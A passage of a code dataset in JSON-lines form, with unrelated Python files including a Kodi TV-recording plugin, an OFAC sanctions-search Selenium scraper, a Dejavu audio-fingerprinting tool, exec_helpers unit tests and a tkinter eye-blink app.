recording_title))\n else:\n refresh_view(msg=tr(TR_RECORDING_DELETED, recording_title))\n\n\n@plugin.route('/action/create-recording//')\ndef action_create_recording(broadcast_id, broadcast_title):\n if xbmcgui.Dialog().yesno(tr(TR_TITLE_RECORD_BROADCAST), tr(TR_RECORD_BROADCAST, broadcast_title)):\n try:\n recording = new_pvr().create_recording(int(broadcast_id))\n assert isinstance(recording, pybongtvapi.Recording)\n except (pybongtvapi.Error, AssertionError):\n refresh_view(msg=tr(TR_CANNOT_RECORD_BROADCAST, broadcast_title))\n else:\n notify(tr(TR_WILL_RECORD_BROADCAST, broadcast_title))\n\n@plugin.route('/epg')\ndef page_epg():\n def producer():\n for channel in get_channels():\n yield new_channel_item(channel, path=plugin.url_for('page_epg_channel', channel_id=channel.channel_id,\n offset=0))\n items = tuple(producer())\n return finish(items)\n\n\n@plugin.route('/epg//')\ndef page_epg_channel(channel_id, offset):\n def producer():\n channel = get_channel(channel_id)\n broadcasts = channel.get_broadcasts_per_day(offset=int(offset))\n for broadcast in broadcasts:\n path = plugin.url_for('action_create_recording', broadcast_id=broadcast.broadcast_id,\n broadcast_title=normalize_title(broadcast, include_time=False))\n yield new_broadcast_item(broadcast, path=path)\n if broadcasts:\n time.time() + (int(offset) + 1)\n next_day = time.strftime('%d.%m.', time.localtime(time.time() + ((int(offset) + 1) * 3600 * 24)))\n next_day_label = tr(TR_NEXT_DAYS_BROADCASTS, next_day)\n yield dict(label=next_day_label, path=plugin.url_for('page_epg_channel', channel_id=channel_id,\n offset=int(offset) + 1))\n if int(offset) >= 1:\n time.time() + (int(offset) + 1)\n previous_day = time.strftime('%d.%m.', time.localtime(time.time() + ((int(offset) - 1) * 3600 * 24)))\n previous_day_label = tr(TR_PREVIOUS_DAYS_BROADCASTS, previous_day)\n yield dict(label=previous_day_label, path=plugin.url_for('page_epg_channel', channel_id=channel_id,\n offset=int(offset) - 1))\n yield dict(label=tr(TR_LIST_OF_BROADCASTS), path=plugin.url_for('page_epg'))\n items = tuple(producer())\n return finish(items, content_type=MOVIES)\n\n@plugin.route('/search')\ndef page_search():\n def producer():\n for broadcast in new_epg().search_broadcasts(search_pattern):\n path = plugin.url_for('action_create_recording', broadcast_id=broadcast.broadcast_id,\n broadcast_title=normalize_title(broadcast, include_time=True,\n include_channel_name=True))\n yield new_broadcast_item(broadcast, path=path, include_time=True, include_channel_name=True)\n\n search_pattern = (plugin.keyboard(heading=tr(TR_TITLE_SEARCH_MATCHING_BROADCASTS)) or '').strip()\n if search_pattern:\n items = tuple(producer())\n if items:\n notify(tr(TR_X_MATCHING_BROADCASTS_FOUND, len(items), search_pattern))\n return finish(items, content_type='movies', view_mode_id=504)\n else:\n refresh_view(msg=tr(TR_NO_MATCHING_BROADCASTS_FOUND, search_pattern))\n\n\nif __name__ == '__main__':\n plugin.run()\n","sub_path":"addon.py","file_name":"addon.py","file_ext":"py","file_size_in_byte":14604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"197730963","text":"#turn minutes in military time and it'll be pretty much finished\n\ndef get_start_time(schedules, duration):\n\tprint(schedules, duration)\n\tmilitaryTime, freeTime = (duration/60)*100+duration%60, [[],[],[],[],[],[],[]]\n\tfor x in range(len(schedules)):\n\t\ttry:\n\t\t\tif schedules[x][0][0]!='09:00' and int(schedules[x][0][0].replace(':',''))-900>=militaryTime:\n\t\t\t\tfreeTime[x].insert(0,[900, int(schedules[x][0][0].replace(':',''))])\n\t\texcept: pass\n\t\tfor key, char in enumerate(schedules[x]):\n\t\t\ttry:\t\t\t\t\n\t\t\t\tif int(schedules[x][key+1][0].replace(':',''))-int(schedules[x][key][1].replace(':',''))>=militaryTime:\n\t\t\t\t\tfreeTime[x].append([int(schedules[x][key][1].replace(':','')), int(schedules[x][key+1][0].replace(':',''))])\n\t\t\texcept IndexError:\n\t\t\t\tif 1900-int(schedules[x][key][1].replace(':',''))>=militaryTime: \n\t\t\t\t\tfreeTime[x].append([int(schedules[x][key][1].replace(':','')),int('1900')])\n\tprint('\\n\\n\\n')\n\tfor x in freeTime: print(x)\n\tfor key, char in enumerate(freeTime[0]):\n\t\tstart, end = min(char), max(char)\n\t\tcount, answer = 1, [min(char)]\n\t\twhile count!=len(schedules):\n\t\t\tfor i in freeTime[count]:\n\t\t\t\tif min(i)>=min(answer) and min(i)<=end:\n\t\t\t\t\tstart = min(i)\n\t\t\t\t\tanswer.append(start)\n\t\t\t\tif max(i) <= end and max(i)>=start:\n\t\t\t\t\tend = max(i)\n\t\t\t\tif start in range(min(i),max(i)+1) and min(i)<=end:\n\t\t\t\t\tanswer.append(min(i))\n\t\t\tcount+=1\n\t\tif len(answer)>=len(schedules):\n\t\t\tprint(end, start)\n\t\t\ttry:\n\t\t\t\tif end-start >= militaryTime: \n\t\t\t\t\tif start>1000:\n\t\t\t\t\t\treturn str(max(answer))[:2]+':'+str(max(answer))[2:]\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn '0'+str(max(answer))[:1]+':'+str(max(answer))[1:]\n\t\t\t\telse: pass\n\t\t\texcept UnboundLocalError: return None\n\t\tcount = 1\n\nschedules = [\n[['09:09', '11:27'], ['12:14', '13:41'], ['15:16', '17:17'], ['17:32', '18:50']], [['10:38', '12:06'], ['13:39', '15:08'], ['17:23', '17:26'], ['18:02', '18:26']]\n]\n\nprint(get_start_time(schedules, 11))\n\n\n\n\n\n\n\n\n\n","sub_path":"smallProjects/schedules.py","file_name":"schedules.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"598067323","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.support.ui import Select\r\nfrom selenium.common.exceptions import NoSuchElementException\r\n\r\n\r\ndef getresultsaftersearch(form_dict):\r\n #create a browser instance and wait instance on browser for 10 sec\r\n browser = webdriver.Chrome('./chromedriver')\r\n wait = WebDriverWait(browser, 10)\r\n browser.get('https://sanctionssearch.ofac.treas.gov/')\r\n\r\n # waiting for the page to be loaded\r\n wait.until(EC.presence_of_element_located((By.XPATH, '//*[@id=\"ctl00_MainContent_ddlType\"]')))\r\n\r\n # try entering the given values to the page\r\n try:\r\n #select the given Type from the list or else All will be selected by default\r\n select = Select(browser.find_element_by_id('ctl00_MainContent_ddlType'))\r\n select.select_by_visible_text(form_dict['Type'])\r\n #Enter the Address if given\r\n form_dict.get('Address') is not None and browser.find_element_by_id(\"ctl00_MainContent_txtAddress\").send_keys(form_dict['Address'])\r\n #Enter the given Full name\r\n browser.find_element_by_id(\"ctl00_MainContent_txtLastName\").send_keys(form_dict['Name'])\r\n #Enter the City if given\r\n form_dict.get('City') is not None and browser.find_element_by_id(\"ctl00_MainContent_txtCity\").send_keys(form_dict['City'])\r\n #Enter the ID Field if given\r\n form_dict.get('ID_Field') is not None and browser.find_element_by_id(\"ctl00_MainContent_txtID\").send_keys(form_dict['ID_Field'])\r\n #Enter the State if given\r\n form_dict.get('State') is not None and browser.find_element_by_id(\"ctl00_MainContent_txtState\").send_keys(form_dict['State'])\r\n #Choose multiple Program values if given\r\n if form_dict.get('Program') is not None:\r\n programs = list()\r\n programs.append(form_dict.get('Program'))\r\n for val in programs:\r\n path = \"//select[@name='ctl00$MainContent$lstPrograms']/option[text()='\" + val + \"']\"\r\n browser.find_element_by_xpath(path).click()\r\n #Select the Country if given or else All will be selected by default\r\n select = Select(browser.find_element_by_id('ctl00_MainContent_ddlCountry'))\r\n select.select_by_visible_text(form_dict['Country'])\r\n #Select the List if given or else All will be selected by default\r\n select = Select(browser.find_element_by_id('ctl00_MainContent_ddlList'))\r\n select.select_by_visible_text(form_dict['List'])\r\n #Clear the minimum name score and enter the given value\r\n browser.find_element_by_id(\"ctl00_MainContent_Slider1_Boundcontrol\").send_keys(Keys.BACKSPACE, Keys.BACKSPACE, Keys.BACKSPACE)\r\n browser.find_element_by_id(\"ctl00_MainContent_Slider1_Boundcontrol\").send_keys(str(form_dict['MinNameScore']))\r\n\r\n except Exception:\r\n raise Exception('Please enter the correct values for the fields')\r\n\r\n\r\n #click on submit if everything is good\r\n browser.find_element_by_id(\"ctl00_MainContent_btnSearch\").click()\r\n\r\n\r\n #wait for the results to show if any and collect the results\r\n try:\r\n wait.until(EC.presence_of_element_located((By.ID, 'gvSearchResults')))\r\n except NoSuchElementException():\r\n res=list()\r\n res.append({'results' : None})\r\n else:\r\n res=list()\r\n table_id = browser.find_element(By.ID, 'gvSearchResults')\r\n rows = table_id.find_elements(By.TAG_NAME, \"tr\") # get all of the rows in the table\r\n for row in rows:\r\n d = {\r\n 'Name': row.find_elements(By.TAG_NAME, \"td\")[0].text,\r\n 'Address': row.find_elements(By.TAG_NAME, \"td\")[1].text,\r\n 'Type': row.find_elements(By.TAG_NAME, \"td\")[2].text,\r\n 'Programs': row.find_elements(By.TAG_NAME, \"td\")[3].text,\r\n 'List': row.find_elements(By.TAG_NAME, \"td\")[4].text,\r\n 'Score': row.find_elements(By.TAG_NAME, \"td\")[5].text\r\n }\r\n res.append(d)\r\n\r\n return res","sub_path":"crawlthesite/getresults.py","file_name":"getresults.py","file_ext":"py","file_size_in_byte":4229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"653560240","text":"# coding=utf-8\r\n\r\n\"\"\"\r\n242. Valid Anagram\r\nGiven two strings s and t, write a function to determine if t is an anagram of s.\r\n\r\nFor example,\r\ns = \"anagram\", t = \"nagaram\", return true.\r\ns = \"rat\", t = \"car\", return false.\r\n\r\nNote:\r\nYou may assume the string contains only lowercase alphabets.\r\n\r\nFollow up:\r\nWhat if the inputs contain unicode characters? How would you adapt your solution to such case?\r\n\"\"\"\r\n\r\n\r\nclass Solution(object):\r\n def isAnagram(self, s, t):\r\n \"\"\"\r\n :type s: str\r\n :type t: str\r\n :rtype: bool\r\n \"\"\"\r\n if s is None or t is None:\r\n return False\r\n # if len(s) == 0 and len(t) == 0:\r\n # return True\r\n\r\n dict_s = {}\r\n alphabets = \"abcdefghijklmnopqrstuvwxyz\"\r\n for item in alphabets:\r\n dict_s[item] = 0\r\n for item in s:\r\n dict_s[item] = dict_s[item] + 1\r\n for item in t:\r\n dict_s[item] -= 1\r\n for key in dict_s.keys():\r\n if dict_s[key] != 0:\r\n return False\r\n return True\r\n\r\n\r\nif __name__ == '__main__':\r\n print (Solution().isAnagram(\"a\", \"ab\"))\r\n","sub_path":"zishell/solution/easy/solution242_isAnagram.py","file_name":"solution242_isAnagram.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"624409981","text":"import argparse\nimport json\nimport sys\nimport os\nfrom argparse import RawTextHelpFormatter\nfrom os.path import isdir\nimport glob\nimport librosa\nimport soundfile as sf\n\nfrom dejavu import Dejavu\nfrom dejavu.logic.recognizer.file_recognizer import FileRecognizer\nfrom dejavu.logic.recognizer.microphone_recognizer import MicrophoneRecognizer\n\nDEFAULT_CONFIG_FILE = \"dejavu.cnf.DOCKER\"\n\n\ndef init(configpath):\n \"\"\"\n Load config from a JSON file\n \"\"\"\n try:\n with open(configpath) as f:\n config = json.load(f)\n except IOError as err:\n print(f\"Cannot open configuration: {str(err)}. Exiting\")\n sys.exit(1)\n\n # create a Dejavu instance\n return Dejavu(config)\n\n\ndef split_track(path_to_track, path_to_folder_save):\n if not os.path.exists(path_to_folder_save):\n os.mkdir(path_to_folder_save)\n file_name = path_to_track.split('/')[-1]\n loaded_track, sr = librosa.load(path_to_track, sr=44100)\n # sr, loaded_track = wavfile.read(path_to_track)\n duration = len(loaded_track) / sr\n print(f\"Duration track: {duration}\")\n duration_10 = int(duration // 10)\n for i in range(duration_10):\n os.system(\n f'ffmpeg -i \"{path_to_track}\" -ss {i * 10} -to {i * 10 + 10} -c copy \"{path_to_folder_save}/10sec_{i}_{file_name}\" -n -hide_banner -loglevel error')\n return path_to_folder_save\n\n\ndef change_sample_rate_file(path_to_file, SR=44100, CHANNELS=1):\n file_dir = os.path.join(*path_to_file.split('/')[:-1])\n file_name = path_to_file.split('/')[-1]\n if not file_name.startswith(\"sr44100_ch1\") or not file_name.startswith(\"10sec_\"):\n new_directory = os.path.join(file_dir, \"sr44100_ch1\")\n if not os.path.exists(new_directory):\n os.mkdir(new_directory)\n loaded_track, sr = librosa.load(path_to_file, sr=SR)\n if file_name.endswith(\"mp3\"):\n file_name = file_name[:-3] + 'wav'\n new_file_path = f'{new_directory}/sr44100_ch1_{file_name}'\n sf.write(new_file_path, loaded_track, sr)\n return new_file_path\n return path_to_file\n\n\ndef change_sample_rate_folder(path_to_folder, SR=44100, CHANNELS=1):\n if path_to_folder.split('/')[-1] in [\"sr44100_ch1\", \"music_slices_sr44100_ch1\"]:\n return path_to_folder\n new_folder = os.path.join(path_to_folder, \"sr44100_ch1\")\n if not os.path.exists(new_folder):\n os.mkdir(new_folder)\n data_files = glob.glob(path_to_folder+\"/*.wav\") + glob.glob(path_to_folder+\"/*.mp3\")\n data_files_sr44100_ch1 = glob.glob(new_folder + \"/*.wav\")\n for i in range(len(data_files_sr44100_ch1)):\n data_files_sr44100_ch1[i] = data_files_sr44100_ch1[i].split('/')[-1][12:-3]\n for track in data_files:\n file_name = track.split('/')[-1]\n if file_name[:-3] in data_files_sr44100_ch1:\n continue\n loaded_track, sr = librosa.load(track, sr=SR)\n if file_name.endswith(\"mp3\"):\n file_name = file_name[:-3] + 'wav'\n sf.write(f'{new_folder}/sr44100_ch1_{file_name}', loaded_track, sr)\n return new_folder\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=\"Dejavu: Audio Fingerprinting library\",\n formatter_class=RawTextHelpFormatter)\n parser.add_argument('-c', '--config', nargs='?',\n help='Path to configuration file\\n'\n 'Usages: \\n'\n '--config /path/to/config-file\\n')\n parser.add_argument('-f', '--fingerprint', nargs=2,\n help='Fingerprint files in a directory\\n'\n 'Usages: \\n' \n '--fingerprint folder /path/to/directory')\n parser.add_argument('-r', '--recognize', nargs=2,\n help='Recognize what is '\n 'playing through the microphone or in a file.\\n'\n 'Usage: \\n'\n '--recognize mic number_of_seconds \\n'\n '--recognize file path/to/file \\n'\n '--recognize folder path/to/directory \\n')\n parser.add_argument('-s', '--split', nargs=2,\n help='Split by 10 sec to folder music_slices \\n' \n 'Usage: \\n'\n '--split file path/to/file \\n'\n '--split folder path/to/directory \\n')\n args = parser.parse_args()\n\n if not args.fingerprint and not args.recognize and not args.split:\n parser.print_help()\n sys.exit(0)\n\n config_file = args.config\n if config_file is None:\n config_file = DEFAULT_CONFIG_FILE\n\n djv = init(config_file)\n if args.fingerprint:\n # Fingerprint all files in a directory\n if len(args.fingerprint) == 2:\n directory = args.fingerprint[1]\n new_directory = change_sample_rate_folder(directory)\n\n print(f\"Fingerprinting all .wav and .mp3 files in the {new_directory} directory\")\n djv.fingerprint_directory(new_directory, [\".wav\"], 4)\n djv.fingerprint_directory(new_directory, [\".mp3\"], 4)\n\n else:\n print(f\"Something wrong with arguments\")\n\n elif args.recognize:\n # Recognize audio source\n songs = None\n source = args.recognize[0]\n opt_arg = args.recognize[1]\n\n if source in ('mic', 'microphone'):\n songs = djv.recognize(MicrophoneRecognizer, seconds=opt_arg)[0][0]\n print(f'For micro track:')\n print(f'\\tIt is {songs[\"song_name\"]}. \\t\\t\\tConfidence: {int(songs[\"input_confidence\"] * 100)}%')\n elif source == 'file':\n new_path_file = change_sample_rate_file(opt_arg)\n songs = djv.recognize(FileRecognizer, new_path_file)\n print(f'\\tIt is {songs[\"results\"][0][\"song_name\"]}. \\t\\t\\tConfidence: {int(songs[\"results\"][0][\"input_confidence\"] * 100)}%')\n elif source == 'folder':\n new_directory = change_sample_rate_folder(opt_arg)\n data_wav_files = glob.glob(new_directory + \"/*.wav\")\n data_mp3_files = glob.glob(new_directory + \"/*.mp3\")\n data_files = data_wav_files + data_mp3_files\n for file_path in data_files:\n songs = djv.recognize(FileRecognizer, file_path)\n print(f'For track {file_path.split(\"/\")[-1]}:')\n print(f'\\tIt is {songs[\"results\"][0][\"song_name\"]}. \\t\\t\\tConfidence: {int(songs[\"results\"][0][\"input_confidence\"] * 100)}%')\n\n elif args.split:\n # Split audio source\n source = args.split[0]\n opt_arg = args.split[1]\n path_to_folder_save = \"music_slices_sr44100_ch1\"\n\n if source == 'file':\n if not opt_arg.startswith(\"sr44100_ch1\"):\n opt_arg = change_sample_rate_file(opt_arg)\n split_track(opt_arg, path_to_folder_save)\n elif source == 'folder':\n data_dir = opt_arg\n if data_dir.split('/')[-1] != \"sr44100_ch1\":\n data_dir = change_sample_rate_folder(data_dir)\n data_files = glob.glob(data_dir + \"/*.wav\") + glob.glob(data_dir + \"/*.mp3\")\n for track in data_files:\n split_track(track, path_to_folder_save)\n","sub_path":"mine_dejavu.py","file_name":"mine_dejavu.py","file_ext":"py","file_size_in_byte":7312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"554607350","text":"#%%\nimport matplotlib.pyplot as plt\n\nplt.style.use('fivethirtyeight')\n\n\nx_values = [1,2,3,4,5]\ny_values = [1,4,9,16,25]\n\n\nfig, ax = plt.subplots()\nax.scatter(x_values, y_values, s=150)\n\n# Set the title chart and label axis.\nax.set_title('Squares scatter plot.', fontsize = 25)\nax.set_xlabel(\"Value\", fontsize =15)\nax.set_ylabel(\"Square of Value\", fontsize =15)\n\n\n# Change the sixe of ticks in label.\nax.tick_params(axis='both', which = 'major',labelsize=15)\n\n\nplt.show()\n\n# %%\n","sub_path":"generating_data/scatter_squares.py","file_name":"scatter_squares.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"304873940","text":"# Copyright 2018 Alexey Stepanov aka penguinolog.\n\n# Copyright 2016 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n# pylint: disable=no-self-use\n\nimport unittest\n\nimport mock\n\nimport exec_helpers\n\n\ncmd = \"ls -la | awk '{print $1}'\"\n\n\n# noinspection PyTypeChecker\nclass TestExecResult(unittest.TestCase):\n @mock.patch(\"exec_helpers.exec_result.logger\")\n def test_create_minimal(self, logger):\n \"\"\"Test defaults\"\"\"\n result = exec_helpers.ExecResult(cmd=cmd)\n self.assertEqual(result.cmd, cmd)\n self.assertEqual(result.cmd, result[\"cmd\"])\n self.assertEqual(result.stdout, ())\n self.assertEqual(result.stdout, result[\"stdout\"])\n self.assertEqual(result.stderr, ())\n self.assertEqual(result.stderr, result[\"stderr\"])\n self.assertEqual(result.stdout_bin, bytearray())\n self.assertEqual(result.stderr_bin, bytearray())\n self.assertEqual(result.stdout_str, \"\")\n self.assertEqual(result.stdout_str, result[\"stdout_str\"])\n self.assertEqual(result.stderr_str, \"\")\n self.assertEqual(result.stderr_str, result[\"stderr_str\"])\n self.assertEqual(result.stdout_brief, \"\")\n self.assertEqual(result.stdout_brief, result[\"stdout_brief\"])\n self.assertEqual(result.stderr_brief, \"\")\n self.assertEqual(result.stderr_brief, result[\"stderr_brief\"])\n self.assertEqual(result.exit_code, exec_helpers.ExitCodes.EX_INVALID)\n self.assertEqual(result.exit_code, result[\"exit_code\"])\n self.assertEqual(\n repr(result),\n \"{cls}(cmd={cmd!r}, stdout={stdout}, stderr={stderr}, \"\n \"exit_code={exit_code!s})\".format(\n cls=exec_helpers.ExecResult.__name__,\n cmd=cmd,\n stdout=(),\n stderr=(),\n exit_code=exec_helpers.ExitCodes.EX_INVALID,\n ),\n )\n self.assertEqual(\n str(result),\n \"{cls}(\\n\\tcmd={cmd!r},\"\n \"\\n\\t stdout=\\n'{stdout_brief}',\"\n \"\\n\\tstderr=\\n'{stderr_brief}', \"\n \"\\n\\texit_code={exit_code!s}\\n)\".format(\n cls=exec_helpers.ExecResult.__name__,\n cmd=cmd,\n stdout_brief=\"\",\n stderr_brief=\"\",\n exit_code=exec_helpers.ExitCodes.EX_INVALID,\n ),\n )\n\n with self.assertRaises(IndexError):\n # noinspection PyStatementEffect\n result[\"nonexistent\"] # pylint: disable=pointless-statement\n\n with self.assertRaises(exec_helpers.ExecHelperError):\n # noinspection PyStatementEffect\n result[\"stdout_json\"] # pylint: disable=pointless-statement\n logger.assert_has_calls(\n (\n mock.call.exception(\n \"{cmd} stdout is not valid json:\\n\" \"{stdout_str!r}\\n\".format(cmd=cmd, stdout_str=\"\")\n ),\n )\n )\n self.assertIsNone(result[\"stdout_yaml\"])\n\n self.assertEqual(\n hash(result), hash((exec_helpers.ExecResult, cmd, None, (), (), exec_helpers.ExitCodes.EX_INVALID))\n )\n\n @mock.patch(\"exec_helpers.exec_result.logger\", autospec=True)\n def test_not_implemented(self, logger):\n \"\"\"Test assertion on non implemented deserializer\"\"\"\n result = exec_helpers.ExecResult(cmd=cmd)\n deserialize = getattr(result, \"_ExecResult__deserialize\")\n with self.assertRaises(NotImplementedError):\n deserialize(\"tst\")\n logger.assert_has_calls((mock.call.error(\"{fmt} deserialize target is not implemented\".format(fmt=\"tst\")),))\n\n def test_setters(self):\n result = exec_helpers.ExecResult(cmd=cmd)\n self.assertEqual(result.exit_code, exec_helpers.ExitCodes.EX_INVALID)\n\n tst_stdout = [b\"Test\\n\", b\"long\\n\", b\"stdout\\n\", b\"data\\n\", b\" \\n\", b\"5\\n\", b\"6\\n\", b\"7\\n\", b\"8\\n\", b\"end!\\n\"]\n\n tst_stderr = [b\"test\\n\"] * 10\n\n with mock.patch(\"exec_helpers.exec_result.logger\", autospec=True):\n result.read_stdout(tst_stdout)\n self.assertEqual(result.stdout, tuple(tst_stdout))\n self.assertEqual(result.stdout, result[\"stdout\"])\n\n with mock.patch(\"exec_helpers.exec_result.logger\", autospec=True):\n result.read_stderr(tst_stderr)\n self.assertEqual(result.stderr, tuple(tst_stderr))\n self.assertEqual(result.stderr, result[\"stderr\"])\n\n with self.assertRaises(TypeError):\n result.exit_code = \"code\"\n\n result.exit_code = 0\n self.assertEqual(result.exit_code, 0)\n self.assertEqual(result.exit_code, result[\"exit_code\"])\n\n with self.assertRaises(RuntimeError):\n result.exit_code = 1\n\n self.assertEqual(result.exit_code, 0)\n\n self.assertEqual(result.stdout_bin, bytearray(b\"\".join(tst_stdout)))\n self.assertEqual(result.stderr_bin, bytearray(b\"\".join(tst_stderr)))\n\n stdout_br = tst_stdout[:3] + [b\"...\\n\"] + tst_stdout[-3:]\n stderr_br = tst_stderr[:3] + [b\"...\\n\"] + tst_stderr[-3:]\n\n stdout_brief = b\"\".join(stdout_br).strip().decode(encoding=\"utf-8\")\n stderr_brief = b\"\".join(stderr_br).strip().decode(encoding=\"utf-8\")\n\n self.assertEqual(result.stdout_brief, stdout_brief)\n self.assertEqual(result.stderr_brief, stderr_brief)\n\n def test_json(self):\n result = exec_helpers.ExecResult(\"test\", stdout=[b'{\"test\": true}'])\n self.assertEqual(result.stdout_json, {\"test\": True})\n\n @mock.patch(\"exec_helpers.exec_result.logger\", autospec=True)\n def test_wrong_result(self, logger):\n \"\"\"Test logging exception if stdout if not a correct json\"\"\"\n cmd = r\"ls -la | awk '{print $1\\}'\"\n result = exec_helpers.ExecResult(cmd=cmd)\n with self.assertRaises(exec_helpers.ExecHelperError):\n # noinspection PyStatementEffect\n result.stdout_json # pylint: disable=pointless-statement\n logger.assert_has_calls(\n (\n mock.call.exception(\n \"{cmd} stdout is not valid json:\\n\" \"{stdout_str!r}\\n\".format(cmd=cmd, stdout_str=\"\")\n ),\n )\n )\n self.assertIsNone(result[\"stdout_yaml\"])\n\n def test_not_equal(self):\n \"\"\"Exec result equality is validated by all fields.\"\"\"\n result1 = exec_helpers.ExecResult(\"cmd1\")\n result2 = exec_helpers.ExecResult(\"cmd2\")\n self.assertNotEqual(result1, result2)\n\n result1 = exec_helpers.ExecResult(cmd)\n result2 = exec_helpers.ExecResult(cmd)\n result1.read_stdout([b\"a\"])\n result2.read_stdout([b\"b\"])\n self.assertNotEqual(result1, result2)\n\n result1 = exec_helpers.ExecResult(cmd)\n result2 = exec_helpers.ExecResult(cmd)\n result1.read_stderr([b\"a\"])\n result2.read_stderr([b\"b\"])\n self.assertNotEqual(result1, result2)\n\n result1 = exec_helpers.ExecResult(cmd)\n result2 = exec_helpers.ExecResult(cmd)\n result1.exit_code = 0\n result2.exit_code = 1\n self.assertNotEqual(result1, result2)\n\n def test_finalize(self):\n \"\"\"After return code, no stdout/stderr/new code can be received.\"\"\"\n result = exec_helpers.ExecResult(cmd)\n result.exit_code = 0\n\n with self.assertRaises(RuntimeError):\n result.exit_code = 1\n\n with self.assertRaises(RuntimeError):\n result.read_stdout([b\"out\"])\n\n with self.assertRaises(RuntimeError):\n result.read_stderr([b\"err\"])\n\n def test_stdin_none(self):\n result = exec_helpers.ExecResult(cmd, exit_code=0)\n self.assertIsNone(result.stdin)\n\n def test_stdin_utf(self):\n result = exec_helpers.ExecResult(cmd, stdin=\"STDIN\", exit_code=0)\n self.assertEqual(result.stdin, \"STDIN\")\n\n def test_stdin_bytes(self):\n result = exec_helpers.ExecResult(cmd, stdin=b\"STDIN\", exit_code=0)\n self.assertEqual(result.stdin, \"STDIN\")\n\n def test_stdin_bytearray(self):\n result = exec_helpers.ExecResult(cmd, stdin=bytearray(b\"STDIN\"), exit_code=0)\n self.assertEqual(result.stdin, \"STDIN\")\n","sub_path":"test/test_exec_result.py","file_name":"test_exec_result.py","file_ext":"py","file_size_in_byte":8669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"40261742","text":"import brightness\nimport tkinter\nfrom PIL.Image import preinit\nfrom PIL import Image\nimport cv2\nimport PIL.Image\nimport PIL.ImageTk\nimport time\nimport dlib\nfrom numpy.core import shape_base\nfrom numpy.core.fromnumeric import shape\nimport numpy as np\nimport imutils\nfrom scipy import spatial\nfrom scipy.spatial import distance as dist\nfrom imutils import face_utils\n\n\nclass App:\n def __init__(self, window, window_title, video_source=0):\n self.window = window\n self.window.title(window_title)\n self.video_source = video_source\n self.predictor_path = 'C:/Users/manis/Documents/opencv/Detectors/shape_predictor_68_face_landmarks.dat'\n self.predictor = dlib.shape_predictor(self.predictor_path)\n self.detector = dlib.get_frontal_face_detector()\n self.lStart, self.lEnd = face_utils.FACIAL_LANDMARKS_IDXS[\"left_eye\"]\n self.rStart, self.rEnd = face_utils.FACIAL_LANDMARKS_IDXS[\"right_eye\"]\n self.COUNTER = 0\n self.TOTAL = 0\n self.EYE_AR_CONSEC_FRAMES = 3\n self.EYE_AR_THRESH = 0.24\n # Booline values\n self.dist_Bool = False\n self.ebc_Bool = False\n self.start_Bool = False\n # images for buttons\n distance_btn_image = tkinter.PhotoImage(file='./images/distance.png')\n eyeBlinkCount_btn_image = tkinter.PhotoImage(\n file='./images/eyeCount.png')\n start_btn_image = tkinter.PhotoImage(file=\"./images/start.png\")\n\n # open video source (by default this will try to open the computer webcam)\n self.vid = MyVideoCapture(self.video_source)\n\n # Create a canvas that can fit the above video source size\n self.window.geometry('850x550')\n self.window.configure(bg=\"white\")\n self.canvas = tkinter.Canvas(window)\n self.canvas.place(x=505, y=23)\n\n # Button for measuring distance\n tkinter.Button(window, image=distance_btn_image, border=0, borderwidth=0, highlightthickness=0,\n fg='white', command=self.dm).place(x=110, y=110)\n\n # Button for counting eyeblink\n tkinter.Button(window, image=eyeBlinkCount_btn_image, border=0, borderwidth=0, highlightthickness=0,\n fg='white', command=self.ebc).place(x=110, y=210)\n\n # Button for start\n tkinter.Button(window, image=start_btn_image, border=0, borderwidth=0, highlightthickness=0,\n fg='white', command=self.start).place(x=90, y=380)\n\n # Button for stop\n tkinter.Button(window, text=\"Stop\", border=0, borderwidth=0, highlightthickness=0, padx=12, pady=6,\n bg='red', fg='white', command=self.stop).place(x=720, y=500)\n \n # Button for clearing label\n tkinter.Button(window, text='Clear', border=0, borderwidth=0, highlightthickness=0, padx=12, pady=6,\n bg='red', fg='white', command=self.clear).place(x=800, y=500)\n\n # Brightness controller \n v1 = tkinter.DoubleVar()\n v1.set(brightness.current_brightness)\n tkinter.Scale(window, from_=1, to=100, bg=\"white\", label=\"Brightness\",\n highlightthickness=0, length=200, command=lambda val: brightness.set_brightness(val), variable=v1).place(x=300, y=100)\n\n tkinter.Scale(window, from_=1, to=100, bg=\"white\", label=\"Yellow\",\n highlightthickness=0, length=200).place(x=400, y=100)\n\n # Label for displaing distance\n self.dist_label = tkinter.Label(\n window, text=\"\", pady=12, padx=18,\n bg=\"#008cff\", fg='white')\n self.dist_label.place(x=420, y=380)\n\n # Label for displaing eye blink count\n self.blink_count_label = tkinter.Label(\n window, text=\"\", pady=12, padx=18,\n bg=\"#008cff\", fg='white')\n self.blink_count_label.place(x=590, y=380)\n\n self.delay = 1\n self.update()\n\n self.window.mainloop()\n\n def dm(self):\n self.dist_Bool = True\n self.ebc_Bool = False\n self.start_Bool = False\n\n def ebc(self):\n self.dist_Bool = False\n self.ebc_Bool = True\n self.start_Bool = False\n\n def stop(self):\n self.dist_Bool = False\n self.ebc_Bool = False\n 